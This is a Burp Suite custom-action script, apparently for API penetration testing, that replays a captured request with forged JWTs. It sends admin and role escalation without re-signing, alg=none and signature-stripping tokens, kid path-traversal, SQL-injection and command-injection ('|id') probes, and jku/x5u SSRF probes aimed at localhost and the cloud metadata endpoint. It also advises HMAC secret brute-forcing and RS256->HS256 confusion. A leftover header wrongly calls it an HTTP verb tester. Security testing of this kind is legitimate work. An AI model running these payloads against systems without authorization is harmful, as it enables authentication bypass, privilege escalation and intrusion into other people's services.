id: c1fd1a76-8f7a-41d6-8beb-2e02d54cc5db
name: JWTChecker
function: CUSTOM_ACTION
location: REPEATER
source: |
  /**
  * HTTP Verb Tester
  *
  * Performs HTTP verb tampering by replaying the current request
  * with alternative HTTP methods and reports the responses.
  *
  * @author Victor Lima
  * @author Adan Ferreira
  */
  "// ============================================================\r\n// JWT\
  \ / Bearer Token Checker\r\n// Burp Suite Custom Action\r\n//\r\n// Authors: Victor\
  \ Lima | Adan Ferreira\r\n//\r\n// Description:\r\n// JWT validation and tampering\
  \ for API security testing.\r\n//\r\n// Version: 0.1.0\r\n// Last update: 2026-07-17\r\
  \n// ============================================================\r\n\r\n// ============================================================\r\
  \n// ================= BASIC USAGE =================\r\n// ------------------------------------------------------------\r\
  \n// Paste this script in:\r\n// Repeater > Custom actions > New > Blank\r\n//\r\
  \n// Execute only on systems you have authorization to test.\r\n//\r\n// Objective:\r\
  \n//  - Detect multiple JWTs by regex in Authorization and Cookie headers\r\n//\
  \  - Focus: tampering, alg=none, signature removal, permission escalation,\r\n//\
  \    time-claim checks, aud/iss, kid/jku/x5u/jwk/x5c probes\r\n//\r\n// Observation:\r\
  \n//  - Logs only; does not send anything to Repeater.\r\n// ============================================================\r\
  \n\r\n\r\n// ---------- Initialization ----------\r\n\r\nvar baseReq = requestResponse.request();\r\
  \nvar baseRes = requestResponse.response();\r\n\r\nif (baseRes == null) {\r\n  \
  \  logging.logToOutput(\"[!] No response available. Send the request first.\");\r\
  \n    return;\r\n}\r\n\r\n// ---------- JWT Regex and Models ----------\r\n\r\n\
  var jwtRegex = java.util.regex.Pattern.compile(\r\n    \"eyJ[a-zA-Z0-9_-]+\\\\.[a-zA-Z0-9_-]+(?:\\\
  \\.[a-zA-Z0-9_-]*)?\"\r\n);\r\n\r\nclass JwtCandidate {\r\n    String token;\r\n\
  \    String headerName;\r\n    String headerValue;\r\n    int indexInHeader;\r\n\
  \    int globalIndex;\r\n\r\n    JwtCandidate(String token, String headerName, String\
  \ headerValue, int indexInHeader, int globalIndex) {\r\n        this.token = token;\r\
  \n        this.headerName = headerName;\r\n        this.headerValue = headerValue;\r\
  \n        this.indexInHeader = indexInHeader;\r\n        this.globalIndex = globalIndex;\r\
  \n    }\r\n}\r\n\r\n// ---------- JWT Extraction ----------\r\n\r\nvar jwtCandidates\
  \ = new java.util.ArrayList<JwtCandidate>();\r\nint globalCounter = 0;\r\n\r\nfor\
  \ (var h : baseReq.headers()) {\r\n    String headerName = h.name();\r\n    String\
  \ headerValue = h.value();\r\n\r\n    if (headerName.equalsIgnoreCase(\"Authorization\"\
  ) || headerName.equalsIgnoreCase(\"Cookie\")) {\r\n        var matcher = jwtRegex.matcher(headerValue);\r\
  \n        int perHeaderCounter = 0;\r\n\r\n        while (matcher.find()) {\r\n\
  \            perHeaderCounter++;\r\n            globalCounter++;\r\n           \
  \ jwtCandidates.add(new JwtCandidate(\r\n                matcher.group(),\r\n  \
  \              headerName,\r\n                headerValue,\r\n                perHeaderCounter,\r\
  \n                globalCounter\r\n            ));\r\n        }\r\n    }\r\n}\r\n\
  \r\nif (jwtCandidates.isEmpty()) {\r\n    logging.logToOutput(\"[!] No JWTs found\
  \ by regex in Authorization/Cookie headers.\");\r\n    return;\r\n}\r\n\r\n// ----------\
  \ Utility Functions ----------\r\n\r\njava.util.function.Function<String, byte[]>\
  \ b64UrlDecode = (input) -> {\r\n    try {\r\n        String normalized = input.replace('-',\
  \ '+').replace('_', '/');\r\n        int padding = (4 - (normalized.length() % 4))\
  \ % 4;\r\n        normalized = normalized + \"=\".repeat(padding);\r\n        return\
  \ java.util.Base64.getDecoder().decode(normalized);\r\n    } catch (Exception e)\
  \ {\r\n        return null;\r\n    }\r\n};\r\n\r\njava.util.function.Function<String,\
  \ String> b64UrlDecodeToString = (input) -> {\r\n    byte[] out = b64UrlDecode.apply(input);\r\
  \n    return out == null ? null : new String(out, java.nio.charset.StandardCharsets.UTF_8);\r\
  \n};\r\n\r\njava.util.function.Function<String, String> b64UrlEncode = (input) ->\r\
  \n    java.util.Base64.getUrlEncoder().withoutPadding()\r\n        .encodeToString(input.getBytes(java.nio.charset.StandardCharsets.UTF_8));\r\
  \n\r\njava.util.function.Function<String, String> getResHeader = (name) -> {\r\n\
  \    for (var h : baseRes.headers()) {\r\n        if (h.name().equalsIgnoreCase(name))\
  \ return h.value();\r\n    }\r\n    return null;\r\n};\r\n\r\njava.util.function.Function<burp.api.montoya.utilities.json.JsonNode,\
  \ String> nodeToSimpleString = (node) -> {\r\n    if (node == null) return null;\r\
  \n    try {\r\n        if (node.isString()) return node.asString();\r\n        return\
  \ node.toJsonString();\r\n    } catch (Exception e) {\r\n        return node.toJsonString();\r\
  \n    }\r\n};\r\n\r\n// ---------- Error Detection Logic ----------\r\n\r\nvar verboseErrorPatterns\
  \ = java.util.List.of(\r\n    java.util.regex.Pattern.compile(\"(?i)\\\\bstack ?trace\\\
  \\b\"),\r\n    java.util.regex.Pattern.compile(\"(?i)Traceback \\\\(most recent\
  \ call last\\\\)\"),\r\n    java.util.regex.Pattern.compile(\"(?i)Whitelabel Error\
  \ Page\"),\r\n    java.util.regex.Pattern.compile(\"(?i)Fatal error:.*on line \\\
  \\d+\"),\r\n    java.util.regex.Pattern.compile(\"(?i)Warning:.*on line \\\\d+\"\
  ),\r\n    java.util.regex.Pattern.compile(\"(?i)Notice:.*on line \\\\d+\"),\r\n\
  \    java.util.regex.Pattern.compile(\"(?i)Caused by:\"),\r\n    java.util.regex.Pattern.compile(\"\
  (?i)UnhandledPromiseRejection\"),\r\n    java.util.regex.Pattern.compile(\"(?i)TypeError:.*\"\
  ),\r\n    java.util.regex.Pattern.compile(\"(?i)ReferenceError:.*\"),\r\n    java.util.regex.Pattern.compile(\"\
  (?i)SyntaxError:.*\"),\r\n    java.util.regex.Pattern.compile(\"(?i)\\\\bjava\\\\\
  .lang\\\\.\\\\w+Exception\"),\r\n    java.util.regex.Pattern.compile(\"(?i)\\\\\
  bSystem\\\\.\\\\w+Exception\"),\r\n    java.util.regex.Pattern.compile(\"(?i)\\\\\
  bJsonWebTokenError\\\\b\"),\r\n    java.util.regex.Pattern.compile(\"(?i)\\\\bjsonwebtoken\\\
  \\b\"),\r\n    java.util.regex.Pattern.compile(\"(?i)\\\\bjjwt\\\\b\"),\r\n    java.util.regex.Pattern.compile(\"\
  (?i)\\\\bjose\\\\b\"),\r\n    java.util.regex.Pattern.compile(\"(?i)\\\\borg\\\\\
  .springframework\\\\.\\\\w+\\\\b\")\r\n);\r\n\r\njava.util.function.Function<String,\
  \ Boolean> hasVerboseError = (body) ->\r\n    verboseErrorPatterns.stream().anyMatch(p\
  \ -> p.matcher(body).find());\r\n\r\n// ---------- Token Analysis and Testing ----------\r\
  \n\r\nlogging.logToOutput(\"========== JWT / BEARER CHECKER ==========\");\r\nlogging.logToOutput(\"\
  [*] JWTs found: \" + jwtCandidates.size());\r\n\r\nfor (var candidate : jwtCandidates)\
  \ {\r\n    final String finalLocatedToken = candidate.token;\r\n    final String\
  \ finalTokenHeaderName = candidate.headerName;\r\n    final String finalTokenHeaderValue\
  \ = candidate.headerValue;\r\n    final int finalJwtIndex = candidate.globalIndex;\r\
  \n    final int finalJwtIndexInHeader = candidate.indexInHeader;\r\n\r\n    logging.logToOutput(\"\
  \");\r\n    logging.logToOutput(\"========== TESTING JWT #\" + finalJwtIndex + \"\
  \ ==========\");\r\n    logging.logToOutput(\"[*] Header: \" + finalTokenHeaderName);\r\
  \n    logging.logToOutput(\"[*] Position in header: \" + finalJwtIndexInHeader);\r\
  \n\r\n    var jwtParts = finalLocatedToken.split(\"\\\\.\", -1);\r\n    if (jwtParts.length\
  \ < 2) {\r\n        logging.logToOutput(\"[!] JWT #\" + finalJwtIndex + \" is not\
  \ in compact JWT format.\");\r\n        continue;\r\n    }\r\n\r\n    String headerPart\
  \ = jwtParts[0];\r\n    String payloadPart = jwtParts[1];\r\n    String signaturePart\
  \ = jwtParts.length > 2 ? jwtParts[2] : \"\";\r\n\r\n    String decodedHeader =\
  \ b64UrlDecodeToString.apply(headerPart);\r\n    String decodedPayload = b64UrlDecodeToString.apply(payloadPart);\r\
  \n\r\n    if (decodedHeader == null || decodedPayload == null) {\r\n        logging.logToOutput(\"\
  [!] Unable to decode JWT #\" + finalJwtIndex + \" header/payload.\");\r\n      \
  \  continue;\r\n    }\r\n\r\n    burp.api.montoya.utilities.json.JsonNode headerJson;\r\
  \n    burp.api.montoya.utilities.json.JsonNode payloadJson;\r\n\r\n    try {\r\n\
  \        headerJson = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedHeader);\r\
  \n        payloadJson = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedPayload);\r\
  \n    } catch (Exception e) {\r\n        logging.logToOutput(\"[!] Decoded JWT #\"\
  \ + finalJwtIndex + \" header/payload is not valid JSON.\");\r\n        continue;\r\
  \n    }\r\n\r\n    var jwtFindings = new java.util.ArrayList<String>();\r\n    var\
  \ jwtPassed = new java.util.ArrayList<String>();\r\n    var jwtManual = new java.util.ArrayList<String>();\r\
  \n\r\n    java.util.function.BiFunction<String, burp.api.montoya.utilities.json.JsonNode,\
  \ String> buildToken = (headerStr, payloadNode) -> {\r\n        String newHeaderB64\
  \ = b64UrlEncode.apply(headerStr);\r\n        String newPayloadB64 = b64UrlEncode.apply(payloadNode.toJsonString());\r\
  \n        return newHeaderB64 + \".\" + newPayloadB64 + \".\" + signaturePart;\r\
  \n    };\r\n\r\n    java.util.function.BiFunction<String, String, String> buildRawToken\
  \ = (headerStr, payloadStr) -> {\r\n        String newHeaderB64 = b64UrlEncode.apply(headerStr);\r\
  \n        String newPayloadB64 = b64UrlEncode.apply(payloadStr);\r\n        return\
  \ newHeaderB64 + \".\" + newPayloadB64 + \".\" + signaturePart;\r\n    };\r\n\r\n\
  \    java.util.function.Function<String, burp.api.montoya.http.message.requests.HttpRequest>\
  \ withJwtReplaced = (newToken) -> {\r\n        String newHeaderValue = finalTokenHeaderValue.replace(finalLocatedToken,\
  \ newToken);\r\n        return baseReq.withUpdatedHeader(finalTokenHeaderName, newHeaderValue).withService(baseReq.httpService());\r\
  \n    };\r\n\r\n    String algValue = null;\r\n    String typValue = null;\r\n \
  \   boolean hasJwkHeader = false;\r\n    boolean hasJkuHeader = false;\r\n    boolean\
  \ hasKidHeader = false;\r\n    boolean hasX5uHeader = false;\r\n    boolean hasX5cHeader\
  \ = false;\r\n\r\n    if (headerJson.isObject()) {\r\n        var hm = headerJson.asObject().asMap();\r\
  \n\r\n        if (hm.containsKey(\"alg\")) algValue = nodeToSimpleString.apply(hm.get(\"\
  alg\"));\r\n        if (hm.containsKey(\"typ\")) typValue = nodeToSimpleString.apply(hm.get(\"\
  typ\"));\r\n        hasJwkHeader = hm.containsKey(\"jwk\");\r\n        hasJkuHeader\
  \ = hm.containsKey(\"jku\");\r\n        hasKidHeader = hm.containsKey(\"kid\");\r\
  \n        hasX5uHeader = hm.containsKey(\"x5u\");\r\n        hasX5cHeader = hm.containsKey(\"\
  x5c\");\r\n    }\r\n\r\n    logging.logToOutput(\"[*] JWT #\" + finalJwtIndex +\
  \ \" header: \" + decodedHeader);\r\n    logging.logToOutput(\"[*] JWT #\" + finalJwtIndex\
  \ + \" payload: \" + decodedPayload);\r\n    logging.logToOutput(\"[*] JWT #\" +\
  \ finalJwtIndex + \" alg=\" + algValue + \" | typ=\" + typValue + \" | parts=\"\
  \ + jwtParts.length);\r\n\r\n    // ---------- Alg & Typ checks ----------\r\n\r\
  \n    if (algValue == null) jwtFindings.add(\"[HIGH] JWT missing alg field in header\"\
  );\r\n    else jwtPassed.add(\"JWT contains alg field: \" + algValue);\r\n\r\n \
  \   if (\"none\".equalsIgnoreCase(algValue)) jwtFindings.add(\"[CRITICAL] JWT baseline\
  \ uses alg=none\");\r\n    if (algValue != null && (algValue.equalsIgnoreCase(\"\
  HS256\") || algValue.equalsIgnoreCase(\"HS384\") || algValue.equalsIgnoreCase(\"\
  HS512\"))) {\r\n        jwtManual.add(\"JWT uses HMAC (\" + algValue + \") - consider\
  \ offline brute-forcing a weak secret\");\r\n    }\r\n    if (algValue != null &&\
  \ (algValue.equalsIgnoreCase(\"RS256\") || algValue.equalsIgnoreCase(\"RS384\")\
  \ || algValue.equalsIgnoreCase(\"RS512\"))) {\r\n        jwtManual.add(\"JWT uses\
  \ RSA (\" + algValue + \") - test RS256->HS256 confusion if a public key is exposed\"\
  );\r\n    }\r\n    if (algValue != null && (algValue.equalsIgnoreCase(\"ES256\"\
  ) || algValue.equalsIgnoreCase(\"ES384\") || algValue.equalsIgnoreCase(\"ES512\"\
  ))) {\r\n        jwtManual.add(\"JWT uses ECDSA (\" + algValue + \") - validate\
  \ library and implementation; nonce reuse requires offline analysis\");\r\n    }\r\
  \n\r\n    if (hasJwkHeader) jwtFindings.add(\"[HIGH] JWT header contains embedded\
  \ jwk - potential key injection surface\");\r\n    if (hasJkuHeader) jwtFindings.add(\"\
  [HIGH] JWT header contains jku - potential JWKS spoofing / SSRF surface\");\r\n\
  \    if (hasKidHeader) jwtManual.add(\"JWT header contains kid - test for path traversal,\
  \ SQLi, or command injection in the key resolver\");\r\n    if (hasX5uHeader) jwtFindings.add(\"\
  [HIGH] JWT header contains x5u - potential SSRF / trusted key abuse surface\");\r\
  \n    if (hasX5cHeader) jwtFindings.add(\"[HIGH] JWT header contains x5c - assess\
  \ certificate injection / trust abuse\");\r\n\r\n    // ---------- Claims Analysis\
  \ ----------\r\n\r\n    boolean hasExp = false;\r\n    boolean hasNbf = false;\r\
  \n    boolean hasIat = false;\r\n    boolean hasAud = false;\r\n    boolean hasIss\
  \ = false;\r\n    boolean hasJti = false;\r\n\r\n    if (payloadJson.isObject())\
  \ {\r\n        var pm = payloadJson.asObject().asMap();\r\n        hasExp = pm.containsKey(\"\
  exp\");\r\n        hasNbf = pm.containsKey(\"nbf\");\r\n        hasIat = pm.containsKey(\"\
  iat\");\r\n        hasAud = pm.containsKey(\"aud\");\r\n        hasIss = pm.containsKey(\"\
  iss\");\r\n        hasJti = pm.containsKey(\"jti\");\r\n\r\n        if (!hasExp)\
  \ jwtFindings.add(\"[HIGH] JWT missing exp claim\");\r\n        else jwtPassed.add(\"\
  JWT contains exp claim\");\r\n\r\n        if (!hasIat) jwtFindings.add(\"[MEDIUM]\
  \ JWT missing iat claim\");\r\n        else jwtPassed.add(\"JWT contains iat claim\"\
  );\r\n\r\n        if (!hasNbf) jwtManual.add(\"JWT missing nbf - verify whether\
  \ the application enforces a minimum validity window\");\r\n        if (!hasAud)\
  \ jwtManual.add(\"JWT missing aud - verify cross-service reuse\");\r\n        if\
  \ (!hasIss) jwtManual.add(\"JWT missing iss - verify issuer validation\");\r\n \
  \       if (!hasJti) jwtManual.add(\"JWT missing jti - assess replay risk / lack\
  \ of revocation\");\r\n\r\n        for (String key : pm.keySet()) {\r\n        \
  \    String lowered = key.toLowerCase();\r\n            String valuePreview = pm.get(key).toJsonString();\r\
  \n\r\n            if (lowered.contains(\"password\") || lowered.contains(\"secret\"\
  ) || lowered.contains(\"apikey\") ||\r\n                lowered.contains(\"api_key\"\
  ) || lowered.contains(\"token\") || lowered.contains(\"hash\")) {\r\n          \
  \      jwtFindings.add(\"[HIGH] Possible sensitive data in JWT claim: \" + key +\
  \ \"=\" + valuePreview);\r\n            }\r\n\r\n            if (lowered.equals(\"\
  role\") || lowered.equals(\"roles\") || lowered.equals(\"scope\") || lowered.equals(\"\
  scp\") ||\r\n                lowered.equals(\"permissions\") || lowered.equals(\"\
  perm\") || lowered.equals(\"isadmin\") ||\r\n                lowered.equals(\"admin\"\
  ) || lowered.equals(\"tenant\") || lowered.equals(\"tenant_id\")) {\r\n        \
  \        jwtManual.add(\"Privileged claim found: \" + key + \" - candidate for privilege\
  \ escalation\");\r\n            }\r\n        }\r\n    }\r\n\r\n    boolean jwtOverHttp\
  \ = baseReq.url().startsWith(\"http://\");\r\n    if (jwtOverHttp) jwtFindings.add(\"\
  [CRITICAL] JWT is being sent over HTTP\");\r\n    else jwtPassed.add(\"JWT is being\
  \ sent over HTTPS\");\r\n\r\n    String hsts = getResHeader.apply(\"Strict-Transport-Security\"\
  );\r\n    if (hsts == null) jwtManual.add(\"Response does not include HSTS - relevant\
  \ for token transport protection\");\r\n\r\n    java.util.function.BiConsumer<String,\
  \ String> testToken = (label, tokenToSend) -> {\r\n        try {\r\n           \
  \ var mutatedReq = withJwtReplaced.apply(tokenToSend);\r\n            if (mutatedReq.httpService()\
  \ == null) {\r\n                logging.logToOutput(\"[!] JWT #\" + finalJwtIndex\
  \ + \" | No HttpService for test: \" + label);\r\n                return;\r\n  \
  \          }\r\n\r\n            var result = api.http().sendRequest(mutatedReq);\r\
  \n            if (result.response() == null) {\r\n                logging.logToOutput(\"\
  NONE [JWT #\" + finalJwtIndex + \"] \" + label + \" | no response\");\r\n      \
  \          return;\r\n            }\r\n\r\n            int st = result.response().statusCode();\r\
  \n            String body = result.response().bodyToString();\r\n            String\
  \ lowerBody = body.toLowerCase();\r\n            boolean verbose = hasVerboseError.apply(body);\r\
  \n\r\n            if (st < 400\r\n                && !lowerBody.contains(\"invalid\
  \ token\")\r\n                && !lowerBody.contains(\"jwt malformed\")\r\n    \
  \            && !lowerBody.contains(\"signature\")\r\n                && !lowerBody.contains(\"\
  unauthorized\")\r\n                && !lowerBody.contains(\"forbidden\")\r\n   \
  \             && !lowerBody.contains(\"expired\")) {\r\n                logging.logToOutput(st\
  \ + \" [HIT] JWT #\" + finalJwtIndex + \" | \" + finalTokenHeaderName + \" | \"\
  \ + label);\r\n            } else if (verbose) {\r\n                logging.logToOutput(st\
  \ + \" [DEBUG] JWT #\" + finalJwtIndex + \" | \" + finalTokenHeaderName + \" | \"\
  \ + label + \" | verbose error exposed\");\r\n            } else {\r\n         \
  \       logging.logToOutput(st + \" [OK] JWT #\" + finalJwtIndex + \" | \" + finalTokenHeaderName\
  \ + \" | \" + label);\r\n            }\r\n        } catch (Exception e) {\r\n  \
  \          logging.logToOutput(\"[!] Exception during JWT #\" + finalJwtIndex +\
  \ \" test \" + label + \": \" + e.getMessage());\r\n        }\r\n    };\r\n\r\n\
  \    // 1) Signature not verified / claim tampering without resigning\r\n    if\
  \ (payloadJson.isObject()) {\r\n        var pm = payloadJson.asObject().asMap();\r\
  \n\r\n        if (pm.containsKey(\"admin\")) {\r\n            var p = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n            p.asObject().putBoolean(\"admin\", true);\r\n            testToken.accept(\"\
  tamper-admin-without-resign\", buildToken.apply(decodedHeader, p));\r\n        }\r\
  \n\r\n        if (pm.containsKey(\"isAdmin\")) {\r\n            var p = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n            p.asObject().putBoolean(\"isAdmin\", true);\r\n            testToken.accept(\"\
  tamper-isAdmin-without-resign\", buildToken.apply(decodedHeader, p));\r\n      \
  \  }\r\n\r\n        if (pm.containsKey(\"role\")) {\r\n            var p = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n            p.asObject().putString(\"role\", \"admin\");\r\n            testToken.accept(\"\
  tamper-role-admin-without-resign\", buildToken.apply(decodedHeader, p));\r\n   \
  \     }\r\n\r\n        if (pm.containsKey(\"scope\")) {\r\n            var p = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n            p.asObject().putString(\"scope\", \"admin superuser root *\");\r\n\
  \            testToken.accept(\"tamper-scope-without-resign\", buildToken.apply(decodedHeader,\
  \ p));\r\n        }\r\n\r\n        if (pm.containsKey(\"permissions\")) {\r\n  \
  \          var p = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n            p.asObject().putString(\"permissions\", \"[\\\"*\\\"]\");\r\n    \
  \        testToken.accept(\"tamper-permissions-without-resign\", buildToken.apply(decodedHeader,\
  \ p));\r\n        }\r\n\r\n        if (!pm.containsKey(\"role\") && !pm.containsKey(\"\
  admin\") && !pm.containsKey(\"isAdmin\")) {\r\n            var p = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n            p.asObject().putString(\"role\", \"admin\");\r\n            testToken.accept(\"\
  inject-role-admin-without-resign\", buildToken.apply(decodedHeader, p));\r\n   \
  \     }\r\n    }\r\n\r\n    // 2) alg=none\r\n    if (headerJson.isObject()) {\r\
  \n        var hNone = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedHeader);\r\
  \n        hNone.asObject().putString(\"alg\", \"none\");\r\n\r\n        String noneHeader\
  \ = hNone.toJsonString();\r\n        String nonePayload = payloadJson.toJsonString();\r\
  \n        String noneToken = b64UrlEncode.apply(noneHeader) + \".\" + b64UrlEncode.apply(nonePayload)\
  \ + \".\";\r\n        testToken.accept(\"alg-none-empty-signature\", noneToken);\r\
  \n\r\n        String[] noneVariants = new String[]{\"None\", \"NONE\", \"NoNe\"\
  };\r\n        for (String variant : noneVariants) {\r\n            var hv = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedHeader);\r\
  \n            hv.asObject().putString(\"alg\", variant);\r\n            String tok\
  \ = b64UrlEncode.apply(hv.toJsonString()) + \".\" + b64UrlEncode.apply(nonePayload)\
  \ + \".\";\r\n            testToken.accept(\"alg-\" + variant + \"-empty-signature\"\
  , tok);\r\n        }\r\n    }\r\n\r\n    // 3) Remove signature entirely\r\n   \
  \ String noSigToken = headerPart + \".\" + payloadPart + \".\";\r\n    testToken.accept(\"\
  remove-signature-keep-original-header-payload\", noSigToken);\r\n\r\n    // 4) Empty\
  \ / junk signature\r\n    String junkSigToken = headerPart + \".\" + payloadPart\
  \ + \".AAAA\";\r\n    testToken.accept(\"junk-signature\", junkSigToken);\r\n\r\n\
  \    // 5) Time claim checks\r\n    if (payloadJson.isObject()) {\r\n        long\
  \ now = java.time.Instant.now().getEpochSecond();\r\n\r\n        if (hasExp) {\r\
  \n            var pExpPast = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n            pExpPast.asObject().putNumber(\"exp\", now - 86400);\r\n         \
  \   testToken.accept(\"expired-exp-claim-without-resign\", buildToken.apply(decodedHeader,\
  \ pExpPast));\r\n\r\n            var pExpFar = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n            pExpFar.asObject().putNumber(\"exp\", now + 315360000L);\r\n     \
  \       testToken.accept(\"excessive-exp-10-years-without-resign\", buildToken.apply(decodedHeader,\
  \ pExpFar));\r\n        } else {\r\n            testToken.accept(\"missing-exp-claim-current-token-shape\"\
  , buildToken.apply(decodedHeader, payloadJson));\r\n        }\r\n\r\n        var\
  \ pNbfFuture = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n        pNbfFuture.asObject().putNumber(\"nbf\", now + 86400);\r\n        testToken.accept(\"\
  future-nbf-without-resign\", buildToken.apply(decodedHeader, pNbfFuture));\r\n\r\
  \n        var pIatFuture = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n        pIatFuture.asObject().putNumber(\"iat\", now + 86400);\r\n        testToken.accept(\"\
  future-iat-without-resign\", buildToken.apply(decodedHeader, pIatFuture));\r\n \
  \   }\r\n\r\n    // 6) Audience / issuer / jti\r\n    if (payloadJson.isObject())\
  \ {\r\n        var pAud = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n        pAud.asObject().putString(\"aud\", \"unexpected-service\");\r\n      \
  \  testToken.accept(\"tamper-aud-without-resign\", buildToken.apply(decodedHeader,\
  \ pAud));\r\n\r\n        var pIss = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n        pIss.asObject().putString(\"iss\", \"https://attacker.invalid/\");\r\n\
  \        testToken.accept(\"tamper-iss-without-resign\", buildToken.apply(decodedHeader,\
  \ pIss));\r\n\r\n        var pJti = burp.api.montoya.utilities.json.JsonNode.jsonNode(payloadJson.toJsonString());\r\
  \n        pJti.asObject().putString(\"jti\", \"replay-test-fixed-jti\");\r\n   \
  \     testToken.accept(\"tamper-jti-fixed-value-without-resign\", buildToken.apply(decodedHeader,\
  \ pJti));\r\n    }\r\n\r\n    // 7) Header abuse probes\r\n    if (headerJson.isObject())\
  \ {\r\n        var hKidTrav = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedHeader);\r\
  \n        hKidTrav.asObject().putString(\"kid\", \"../../../../../../dev/null\"\
  );\r\n        testToken.accept(\"kid-path-traversal\", buildRawToken.apply(hKidTrav.toJsonString(),\
  \ payloadJson.toJsonString()));\r\n\r\n        var hKidSql = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedHeader);\r\
  \n        hKidSql.asObject().putString(\"kid\", \"' OR '1'='1\");\r\n        testToken.accept(\"\
  kid-sqli-probe\", buildRawToken.apply(hKidSql.toJsonString(), payloadJson.toJsonString()));\r\
  \n\r\n        var hKidCmd = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedHeader);\r\
  \n        hKidCmd.asObject().putString(\"kid\", \"|id\");\r\n        testToken.accept(\"\
  kid-command-injection-probe\", buildRawToken.apply(hKidCmd.toJsonString(), payloadJson.toJsonString()));\r\
  \n\r\n        var hJku = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedHeader);\r\
  \n        hJku.asObject().putString(\"jku\", \"http://127.0.0.1:80/jwks.json\");\r\
  \n        testToken.accept(\"jku-ssrf-probe-localhost\", buildRawToken.apply(hJku.toJsonString(),\
  \ payloadJson.toJsonString()));\r\n\r\n        var hX5u = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedHeader);\r\
  \n        hX5u.asObject().putString(\"x5u\", \"http://169.254.169.254/latest/meta-data/\"\
  );\r\n        testToken.accept(\"x5u-ssrf-probe-imds\", buildRawToken.apply(hX5u.toJsonString(),\
  \ payloadJson.toJsonString()));\r\n\r\n        var hJwk = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedHeader);\r\
  \n        hJwk.asObject().putString(\"jwk\", \"{\\\"kty\\\":\\\"RSA\\\",\\\"e\\\"\
  :\\\"AQAB\\\",\\\"n\\\":\\\"attacker\\\"}\");\r\n        testToken.accept(\"embedded-jwk-header-probe\"\
  , buildRawToken.apply(hJwk.toJsonString(), payloadJson.toJsonString()));\r\n\r\n\
  \        var hX5c = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedHeader);\r\
  \n        hX5c.asObject().putString(\"x5c\", \"[\\\"MIIBfakeattackercert\\\"]\"\
  );\r\n        testToken.accept(\"x5c-certificate-injection-probe\", buildRawToken.apply(hX5c.toJsonString(),\
  \ payloadJson.toJsonString()));\r\n    }\r\n\r\n    // 8) RS256 -> HS256 structural\
  \ probe\r\n    if (algValue != null && algValue.equalsIgnoreCase(\"RS256\")) {\r\
  \n        var hConf = burp.api.montoya.utilities.json.JsonNode.jsonNode(decodedHeader);\r\
  \n        hConf.asObject().putString(\"alg\", \"HS256\");\r\n        testToken.accept(\"\
  rs256-to-hs256-confusion-structural-probe\", buildRawToken.apply(hConf.toJsonString(),\
  \ payloadJson.toJsonString()));\r\n        jwtManual.add(\"For a complete RS256->HS256\
  \ confusion attack, obtain the public key/JWKS and sign HS256 with it as the secret\"\
  );\r\n    }\r\n\r\n    logging.logToOutput(\"--- JWT #\" + finalJwtIndex + \" FINDINGS\
  \ (\" + jwtFindings.size() + \") ---\");\r\n    for (String f : jwtFindings) logging.logToOutput(f);\r\
  \n\r\n    logging.logToOutput(\"--- JWT #\" + finalJwtIndex + \" PASSED (\" + jwtPassed.size()\
  \ + \") ---\");\r\n    for (String p : jwtPassed) logging.logToOutput(\"[OK] \"\
  \ + p);\r\n\r\n    logging.logToOutput(\"--- JWT #\" + finalJwtIndex + \" MANUAL\
  \ REVIEW (\" + jwtManual.size() + \") ---\");\r\n    for (String m : jwtManual)\
  \ logging.logToOutput(\"[MANUAL] \" + m);\r\n\r\n    logging.logToOutput(\"==========\
  \ END JWT #\" + finalJwtIndex + \" ==========\");\r\n}\r\n\r\nlogging.logToOutput(\"\
  \");\r\nlogging.logToOutput(\"========== END JWT / BEARER CHECKER ==========\");"
